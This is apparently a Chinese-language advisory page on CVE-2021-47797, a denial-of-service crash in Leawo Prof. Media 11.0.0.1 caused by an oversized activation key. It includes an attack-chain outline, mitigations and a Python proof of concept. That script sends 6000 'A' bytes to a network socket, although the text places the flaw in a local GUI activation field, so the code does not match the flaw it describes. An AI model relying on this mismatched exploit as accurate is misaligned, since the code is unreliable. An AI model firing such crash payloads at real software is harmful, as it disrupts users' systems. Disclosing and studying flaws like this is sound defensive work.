IPBUF安全漏洞报告
English
CVE-2021-47797 CVSS 7.5 高危

CVE-2021-47797: Leawo Prof. Media 11.0.0.1 激活密钥字段拒绝服务漏洞

披露日期: 2026-01-16
来源: [email protected]

漏洞信息

漏洞编号
CVE-2021-47797
漏洞类型
拒绝服务(DoS)
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Leawo Prof. Media 11.0.0.1

相关标签

拒绝服务缓冲区溢出Leawo Prof. MediaCVE-2021-47797高危

漏洞概述

CVE-2021-47797是Leawo Prof. Media 11.0.0.1中的一个拒绝服务漏洞。该漏洞允许攻击者通过在激活密钥字段中输入超大的payload(6000字节的重复字符)来触发应用程序崩溃。攻击者可以利用此漏洞导致软件服务中断,影响用户正常使用。

技术细节

该漏洞存在于Leawo Prof. Media的注册/激活模块中。当用户在激活界面输入激活密钥时,程序未对输入数据进行适当的边界检查。攻击者可以通过构造一个超大的字符串(6000字节的重复字符)作为激活密钥,导致程序内存处理异常,最终引发崩溃。

攻击链分析

STEP 1
步骤1
攻击者识别目标系统上运行的Leawo Prof. Media 11.0.0.1
STEP 2
步骤2
攻击者构造包含6000字节重复字符的恶意激活密钥
STEP 3
步骤3
在软件的注册/激活界面输入该恶意密钥
STEP 4
步骤4
程序处理超大输入时未进行边界检查,导致内存异常
STEP 5
步骤5
应用程序崩溃,造成拒绝服务

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
python import socket import sys def exploit_cve_2021_47797(target_ip, target_port): # 构造6000字节的重复字符作为payload payload = "A" * 6000 try: # 建立socket连接 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_ip, target_port)) # 发送恶意payload s.send(payload.encode()) s.close() print("Payload sent successfully") print(f"Target: {target_ip}:{target_port}") print(f"Payload length: {len(payload)} bytes") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": if len(sys.argv) != 3: print("Usage: python exploit.py <target_ip> <target_port>") sys.exit(1) target_ip = sys.argv[1] target_port = int(sys.argv[2]) exploit_cve_2021_47797(target_ip, target_port)

影响范围

Leawo Prof. Media 11.0.0.1

防御指南

临时缓解措施
在Leawo官方发布修复版本之前,可以采取以下临时缓解措施:1) 限制用户对注册/激活功能的访问;2) 实施输入验证和长度限制;3) 监控异常的系统行为;4) 定期备份重要数据。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表